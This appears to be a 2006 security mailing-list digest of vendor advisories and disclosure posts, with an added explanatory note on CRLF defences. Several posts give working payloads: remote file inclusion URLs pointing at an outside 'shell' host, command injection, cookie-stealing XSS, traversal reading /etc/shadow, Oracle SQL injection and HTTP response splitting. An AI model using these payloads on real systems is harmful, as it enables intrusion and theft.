hack.lu Bluetooth demo

2006-10-23 Thread K F (lists)
As requested by several of the folks that went to hack.lu - 2006 I have 
posted the code for the 'GenerationTwo' InqTana variant at

http://www.digitalmunition.com/hacklu.html

For those that missed it Thierry Zoller of nruns demonstrated a remote 
exploitation of CVE-2005-1333 as a means to compromise both a Bluetooth 
enabled 10.3.9 Macintosh (that has not been patched to 
APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03) and anything that it was 
paired with. The variant also works on 10.4 machines that have not been 
patched with the Mac OS X 10.4.1 and Mac OS X 10.4.7 Updates.


Post-compromise the 'GenerationTwo' variant installs a malicious 
/etc/ttys file with a login getty listening on a Bluetooth rfcomm 
channel. A user is added and a setuid backdoor is left behind for easy 
root access over a Bluetooth rfcomm connection. The final steps of 
exploitation involve the harvesting of any available link keys (via 
KeyHarvest.pl) from blued.plist so that other devices may also be 
exploited.


Much thanks to both Thierry Zoller and the organizers of Hack.lu.

If you have any questions about GenerationTwo feel free to ask. Please 
keep in mind that CVE-2005-1333 was patched almost one and a half years 
ago at this point so I would say that you SHOULD be patched to this by 
now. If you are pen-testing older Macs make sure you check for Bluetooth!

-KF





[USN-368-1] Qt vulnerability

2006-10-23 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-368-1   October 23, 2006
qt-x11-free vulnerability
CVE-2006-4811
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libqt3c102                      3:3.3.3-7ubuntu3.1
  libqt3c102-mt                   3:3.3.3-7ubuntu3.1

Ubuntu 5.10:
  libqt3-mt                       3:3.3.4-8ubuntu5.1

Ubuntu 6.06 LTS:
  libqt3-mt                       3:3.3.6-1ubuntu6.1

After a standard system upgrade you need to restart your Desktop
session to effect the necessary changes.

Details follow:

An integer overflow was discovered in Qt's image loader. By processing
a specially crafted image with an application that uses this library
(like Konqueror), a remote attacker could exploit this to execute
arbitrary code with the application's privileges.


Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3-7ubuntu3.1.diff.gz
      Size/MD5:    62291 8b599a01d2de39b073be2a0bdb8c6475
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3-7ubuntu3.1.dsc
      Size/MD5:     1816 1fdc71e7378ad7c52f29fde182246d2f
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3.orig.tar.gz
      Size/MD5: 17358091 b0b98c938851d42a90632b990dca28c0

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-i18n_3.3.3-7ubuntu3.1_all.deb
      Size/MD5:    78412 3ea93ae55002054c58a4dc90f51329be
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-doc_3.3.3-7ubuntu3.1_all.deb
      Size/MD5:  5421764 68991f2833c99bd70c3c6a190ff0a6d9
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-examples_3.3.3-7ubuntu3.1_all.deb
      Size/MD5:  1552090 6e9316cd2766bcfbaeabc55b3445ad56

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    33004 eefa43c5e3b24370a383a51b36727368
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-dev_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:        3 90e34db6cd69cde1e965e13cb55d5810
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-headers_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:   348742 a952c8e7e1a2988b2621fb723404d47a
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    44636 d3c926f39dcb2b932326bab7106859a8
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt-mysql_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    45944 f3ed38fff143739feb15fc57c549b35a
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mt-odbc_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    63988 54ff31515fe216ef4d157b4213584a12
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt-psql_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    52248 84314a527126a99fb5d4485ca17aeb63
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mt-sqlite_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:   216308 41ae0886649734a7bbf05c9b40b6da44
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:  3110106 3b3d79bfb5e2a9fb6a05771cfeb13078
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mysql_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    46056 75efaa38e659b6f640ba1d937124792d
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-odbc_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    64116 1a2c666f5ee47c8b3d485a07b2ed4e26
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-psql_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:    52382 0633242d929de9b60a1620e5489f40d2
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-sqlite_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:   216424 44cd04f2b0d0d6d07c1fa69c3177c2f6
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:  2996422 36942b9d4853b966ea2746ebaa091ab0
    http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-apps-dev_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:  2114746 2d8a767cfcd05c4de97e06f962b48890
    http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-assistant_3.3.3-7ubuntu3.1_amd64.deb
      Size/MD5:   246458 133a70053ae29a1647565396adbaf415

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-de

Various Cross-Site-Scripting Vulnerabilities in Oracle Reports

2006-10-23 Thread ak
Name              Various Cross-Site-Scripting Vulnerabilities in Oracle Reports [REP01], [REP02]
Severity          Low Risk
Category          Cross Site Scripting (CSS/XSS)
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Date              18 July 2006 (V 1.0)
Advisory          http://www.red-database-security.com/advisory/oracle_reports_css.html

Details
###
The Oracle Reports parameters showenv [REP01], parsequery [REP01], cellwrapper 
[REP02] and delimiter [REP02] are vulnerable to Cross-Site-Scripting.


Affected Products
#
Internet Application Server
Oracle Application Server
Oracle Developer Suite


Patch Information
#
Apply Oracle Critical Patch Update October 2006 (CPU July 2006).



History
###
28-aug-2003 Oracle secalert was informed
29-aug-2003 Bug confirmed
17-oct-2006 Oracle published CPU October 2006
18-oct-2006 Red-Database-Security published this advisory


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


[ GLSA 200610-09 ] libmusicbrainz: Multiple buffer overflows

2006-10-23 Thread Matthias Geerdsen

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libmusicbrainz: Multiple buffer overflows
  Date: October 22, 2006
  Bugs: #144089
ID: 200610-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple buffer overflows have been found in libmusicbrainz, which
could lead to a Denial of Service or possibly the execution of
arbitrary code.

Background
==

libmusicbrainz is a client library used to access MusicBrainz music
meta data.

Affected packages
=

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  media-libs/musicbrainz          < 2.1.4                   >= 2.1.4

Description
===

Luigi Auriemma reported a possible buffer overflow in the
MBHttp::Download function of lib/http.cpp as well as several possible
buffer overflows in lib/rdfparse.c.

Impact
==

A remote attacker could be able to execute arbitrary code or cause
Denial of Service by making use of an overly long "Location" header in
an HTTP redirect message from a malicious server or a long URL in
malicious RDF feeds.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libmusicbrainz users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/musicbrainz-2.1.4"

References
==

  [ 1 ] CVE-2006-4197
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4197

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





http://www.red-database-security.com/advisory/oracle_apex_css_notification_msg.html

2006-10-23 Thread ak
Cross-Site-Scripting Vulnerability in Oracle APEX NOTIFICATION_MSG

Name              Cross-Site-Scripting Vulnerability in Oracle APEX NOTIFICATION_MSG
Systems Affected  Oracle APEX/HTMLDB
Severity          Medium Risk
Category          Cross Site Scripting (XSS/CSS)
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Date              18 October 2006 (V 1.00)
Advisory          http://www.red-database-security.com/advisory/oracle_apex_css_notification_msg.html

Details
###
The parameter NOTIFICATION_MSG contains a cross site scripting 
vulnerability.

Affected Products
#
Oracle APEX/HTMLDB < 2.2.1


Patch Information
#
This bug is fixed with the patch 2.2.1 of APEX which is not part of the 
Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB 
installation to 2.2.1. Patches are currently not available for Oracle 
Application Express.



History
###
03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006
18-oct-2006 Red-Database-Security published this advisory



Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


RMSOFT Cross Site Scripting

2006-10-23 Thread FREAK_PR
Cross Site Scripting
In

RMSOFT  [Catalogo de Imagenes]

URL: modules/rmgs/images.php?kw=alert(document.cookie)&q=search

Google Dork: 
allinurl: /modules/rmgs/

Powered by XOOPS (all versions)
Greetz: _ANtrAX_,HANOWARS,4UREV01R & WWW.C-GROUP.ORG


trawler <= 1.8.1 Remote File Inclusion

2006-10-23 Thread k1tk4t
#
# trawler <= 1.8.1  Remote File Inclusion
# Download Source : http://harald-kampen.de/trawler1.8.1.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia   --  #newhack[dot]org @irc.dal.net

exploit;
http://localhost/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/addtort.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik2.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik3.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/extras_menu.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/farbpalette.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/lese_inc.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/newfile.php?path_red2=http://shell
http://localhost/_msdazu_share/share/insert1.php?path_scr_dat2=http://shell
http://localhost/_msdazu_share/extras/downloads/index.php?path_red=http://shell
and many more bugs in this package, trawler ver 1.8.1 <-- :( this package is openbug

Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]


Symantec Product Security: Symantec Device Driver Elevation of Privileg

2006-10-23 Thread secure
Symantec Product Security Advisory

October 23, 2006

SYM06-022 Symantec Device Driver Elevation of Privilege

Risk Impact:  Medium 
Remote Access: No
Local Access: Yes
Authentication Required: Yes
Exploit available: No

Overview 
Symantec was notified of a vulnerability in a device driver which, if 
successfully exploited, could allow a local attacker to execute arbitrary code 
with elevated privileges or to crash the system. 

Affected Products 

Symantec AntiVirus Corporate Edition 8.1
Symantec AntiVirus Corporate Edition 9.0.3 and earlier 
Symantec Client Security 1.1
Symantec Client Security 2.0.3 and earlier 

Unaffected Products

Symantec AntiVirus Corporate Edition 8.1.1 MR9
Symantec AntiVirus Corporate Edition 9.0.4 and later
Symantec AntiVirus Corporate Edition 10.x
Symantec Client Security  3.x
Norton AntiVirus 2005 and later 
Norton Internet Security 2005 and later 
Norton System Works  2005 and later 

Details

Boon Seng Lim notified Symantec of a vulnerability in SAVRT.SYS which could 
allow a malicious user to use the output buffer of DeviceIoControl() to 
overwrite kernel addresses because the address space of the output buffer was 
not properly validated. A successful exploit could potentially allow a local 
attacker to execute code of their choice with elevated privileges, or to crash 
the system.


Symantec Response

Symantec engineers verified that this issue exists in the affected products listed 
above, and have released updates for currently supported affected products. 

Symantec is not aware of any customers impacted by this issue, or of any 
attempts to exploit the issue.  

Any future updates to this advisory will be posted in the Symantec Advisory:
http://www.symantec.com/avcenter/security/Content/2006.10.23.html


Credit
Symantec would like to thank Boon Seng Lim for reporting this issue, and 
working with us on the resolution.  


CVE
This issue is a candidate for inclusion in the Common Vulnerabilities and 
Exposures (CVE) list (http://cve.mitre.org), which standardizes names for 
security problems. The CVE initiative has assigned CVE-2006-3455 to this issue.


[SECURITY] [DSA 1198-1] New python2.3 packages fix arbitrary code execution

2006-10-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1198-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
October 23rd, 2006                       http://www.debian.org/security/faq
- --

Package: python2.3
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID : CVE-2006-4980
Debian Bug : 391589

Benjamin C. Wiley Sittler discovered that the repr() of the Python 
interpreter allocates insufficient memory when parsing UCS-4 Unicode
strings, which might lead to execution of arbitrary code through
a buffer overflow.

For the stable distribution (sarge) this problem has been fixed in
version 2.3.5-3sarge2. Due to build problems this update lacks fixed
packages for the Alpha and Sparc architectures. Once they are sorted
out, fixed binaries will be released.

For the unstable distribution (sid) this problem has been fixed in
version 2.3.5-16.

We recommend that you upgrade your Python 2.3 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2.dsc
  Size/MD5 checksum: 1146 c38d235942cfb8afc2a134095983fcc3

http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2.diff.gz
  Size/MD5 checksum:  2352797 40d9ed18456b48d968a245de572090f6

http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5.orig.tar.gz
  Size/MD5 checksum:  8512566 9c35e5ca3c487e1c1f70f2fb1ccbfffe

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/python2.3/idle-python2.3_2.3.5-3sarge2_all.deb
  Size/MD5 checksum:   235662 ad56ea2b6e7020e58cca9d3a8119ad94

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-doc_2.3.5-3sarge2_all.deb
  Size/MD5 checksum:  2860658 beb68a0918006c0b8435429bdf679af6

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-examples_2.3.5-3sarge2_all.deb
  Size/MD5 checksum:   513034 38a28c4550fc4a8690e4d9a70f2c9029

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:  3036816 7b448a5a3461e36baabefc85293ef617

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:  1593430 36c9298f302d09612c2739723d2c2631

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:    27150 cc6f50422763cb7e5181f44a9f9f454f

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:    31950 06361f2059f7086e0d31641720ce689f

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:   109784 273a79d36da2b54ccc79aeb84ff4c5a2

  ARM architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:  2879682 5599d0414d3b126c4bfa9e6f767f6b68

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:  1647266 8ea66e2fef0442ae83b6ed65553494ad

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:    26630 36ba9ad6e492d47a65052d645ba01aaa

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:    30356 3037b21cb0196e315d5a97ca211f9f87

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:   107538 86fa9c7568a36645d532812da7dcb419

  HP Precision architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_hppa.deb
  Size/MD5 checksum:  3330806 447ead4cd77babc3f8284b9092e211b3

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_hppa.deb
  Size/MD5 checksum:  1829560 0714c0d2161c2e91e6a351efb67d10dc

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_hppa.deb
  Size/MD5 checksum:    28092 1450042d3e4a8eca1625bacb98c7de17

ht

WikiNi Multiple Cross Site Scripting Vulnerabilities

2006-10-23 Thread raphael . huck
Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and 
the vulns addressed in version 0.4.4.

The name parameter of page wakka.php is not properly sanitized:

http://www.example.com/wakka.php";>

The email parameter of page wakka.php is not properly sanitized:

http://www.example.com/wakka.php";>

Original advisory: http://zone14.free.fr/advisories/6/

--Raphael HUCK


Application orders Linux in WebAPP v0.9.9.2.1

2006-10-23 Thread the_free_kernel
By b0rizQ

Dork : inurl:"apage/apage.cgi OR  powered by WebAPP v0.9.9.2.1

File : apage.cgi 

Exploits : 

http://www.exemple.com/cgi-bin/mods/apage/apage.cgi?f=training.htm.|pwd|


Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT

2006-10-23 Thread Debasis Mohanty

Vendor:  Shop-Script (a division of WebAsyst LLC)
Application: Shop-Script (www.shop-script.com)

I. Descriptions:

Shop-Script is a PHP based shopping cart. Multiple links of
shop-script are vulnerable to a new form of application attack
technique called HTTP Response splitting (aka CRLF Injection). HTTP
Response Splitting enables an attacker to alter the HTTP
response header structure, which can lead to a range of attacks
such as web cache poisoning, temporary defacement,
hijacking pages or cross-site scripting (XSS). This happens since the
user input is injected into the value section of an HTTP
header without properly escaping/removing CRLF characters, which can
lead to two HTTP responses instead of one response.



II. Affected Links:

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST 
/premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST 
/premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&save_voting_results=yes
HTTP/1.0
POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST 
/premium/index.php?searchstring=&inside=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0



III. Proof-of-concept:

[Request Header]

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
CLR 1.1.4322)
Host: www.shop-script-demo.com
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1


[Response Header]

HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header   <= [Custom response header injected 
by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html



IV. Remediation:
Sanitize CR(0x13) and LF(0x10) from the user input or properly encode
the output in order to prevent the injection of custom HTTP headers.



V. Reference:
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html



VI. Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com


For more vulnerabilities visit -
http://hackingspirits.com/vuln-rnd/vuln-rnd.html
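The mechanism described in the advisory above, as an added example that is not part of the original post or of Shop-Script's code: a decoded query value containing CR (0x0d) and LF (0x0a) is pasted into a Location header, a minimal header parser shows the injected line arriving as a separate header, and two defences are shown beside it (refusing control characters, and percent-encoding the value before it reaches the header). The request value, the response builders, the helper names and the sample log lines are all constructed for this illustration.

```python
import re
from urllib.parse import quote, unquote

# Constructed: the query value from the advisory's proof of concept. The web server
# URL-decodes it before the application sees it, turning %0d%0a into a real CR LF.
RAW_PARAM = "%0d%0aFakeHeader:Fake_Custom_Header"


def build_redirect_vulnerable(param_value: str) -> bytes:
    """A 302 built the way a naive header("Location: ...") call would build it:
    the decoded value is pasted into the header line with no check for CR/LF."""
    headers = [
        "HTTP/1.1 302 Found",
        "Location: index.php?links_exchange=" + param_value,
        "Content-Length: 0",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("latin-1")


def header_value_is_safe(value: str) -> bool:
    """Defence 1: refuse any value carrying CR (0x0d), LF (0x0a) or NUL."""
    return not re.search(r"[\r\n\x00]", value)


def build_redirect_hardened(param_value: str) -> bytes:
    """Defence 1 + 2: reject unsafe values with a 400, and percent-encode what is
    accepted before it is placed in the header, so CR/LF can only ever appear as
    the literal text '%0D%0A' inside the URL."""
    if not header_value_is_safe(param_value):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
    headers = [
        "HTTP/1.1 302 Found",
        "Location: index.php?links_exchange=" + quote(param_value, safe=""),
        "Content-Length: 0",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("latin-1")


def parse_headers(raw: bytes) -> dict:
    """Minimal header parser, reading the wire bytes the way a proxy or browser
    would: the status line goes under '_status', then one entry per header line."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    result = {"_status": lines[0]}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        result[name.strip()] = value.strip()
    return result


def detect_crlf_in_query(log_line: str) -> bool:
    """Detection: flag an access-log entry whose request line carries an encoded
    or literal CR/LF anywhere in the URL."""
    return bool(re.search(r"[\r\n]", unquote(log_line)))


if __name__ == "__main__":
    decoded = unquote(RAW_PARAM)
    print(parse_headers(build_redirect_vulnerable(decoded)))   # FakeHeader is a header
    print(parse_headers(build_redirect_hardened(decoded)))     # 400, nothing injected
    print(detect_crlf_in_query("POST /premium/index.php?news=%0d%0aFakeHeader:X HTTP/1.0"))
```

Rejecting the value is the stronger of the two defences because it also protects any other sink the value reaches; percent-encoding alone is correct only for a value that is going into a URL, as it is here.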


Re: [Full-disclosure] hack.lu Bluetooth demo

2006-10-23 Thread Thierry Zoller
Dear List,

Thanks Kevin for all your time and commitment :)

Slides of the talk (Hack.lu) : http://secdev.zoller.lu/research/hack_lu_2006.pdf
Bluetooth_Cracker : http://secdev.zoller.lu/research/bluetoothcracker.htm

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



SQL Injection in Oracle package MDSYS.SDO_LRS

2006-10-23 Thread ak
Name              SQL Injection in package MDSYS.SDO_LRS (7569081) [DB13]
Systems Affected  Oracle 9i Rel. 2
Severity          High Risk
Category          SQL Injection
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          18 October 2006 (V 1.00)
Advisory          http://www.red-database-security.com/advisory/oracle_sql_injection_sdo_lrs.html

Details
###
The package MDSYS.SDO_LRS contains a SQL injection vulnerability in the first 
parameter of convert_to_lrs_layer. Oracle forgot to fix this problem with the 
April CPU. Oracle fixed these vulnerabilities with the package DBMS_ASSERT. To 
exploit this vulnerability it is necessary to have the privilege to create a 
PL/SQL-function.


Sample
##
After running the following SQL statement
   select sdo_lrs.convert_to_lrs_layer('"'' or 5=5--''"','RDS','A',1,1,1,1) 
from dual;

The following SQL statement will be executed by Oracle:
 
  SELECT COUNT(*) FROM USER_SDO_INDEX_INFO WHERE TABLE_NAME = '"' OR 5=5--'"' 
AND COLUMN_NAME = 'RDS'


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
19-apr-2006 Oracle secalert was informed
18-oct-2006 Oracle published CPU October 2006 [DB13]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


SQL Injection in package SYS.DBMS_CDC_IMPDP

2006-10-23 Thread ak
Name              SQL Injection in package SYS.DBMS_CDC_IMPDP [DB04]
Systems Affected  Oracle 10g
Severity          High Risk
Category          SQL Injection
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          18 October 2006 (V 1.00)
Advisory          http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp2.html


Details
###
The package SYS.DBMS_CDC_IMPDP contains SQL injection vulnerabilities. Oracle 
fixed this by using dbms_assert.


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
1-nov-2005 Oracle secalert was informed.
18-oct-2006 Oracle published CPU October 2006 [DB04]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


INCA IM-204 Dsl several vulnerabilities

2006-10-23 Thread crackers_child


INCA IM-204 Dsl  several vulnerabilities


Found By Crackers_Child

[EMAIL PROTECTED]

==


Directory traversal

http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/passwd


http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/shadow


http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/config.xml



Greetz

X_Alperen_X and All SiberSavascilar.Com !







SQL Injection in package XDB.DBMS_XDBZ0

2006-10-23 Thread ak
Name              SQL Injection in package XDB.DBMS_XDBZ0 [DB01]/[DB15]
Systems Affected  Oracle 9i Rel.2 - 10g Rel. 2
Severity          High Risk
Category          SQL Injection
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          18 October 2006 (V 1.00)
Advisory          http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_xdbz0.html

Details
###
The package XDB.DBMS_XDBZ0 contains SQL injection vulnerabilities in the 
procedures enable_hierarchy_internal [DB01] and disable_hierarchy_internal [DB15]. 
Oracle fixed this problem by using bind variables and verifying table names.


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
1-nov-2005 Oracle secalert was informed about both bugs.
18-oct-2006 Oracle published CPU October 2006 [DB01], [DB15]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
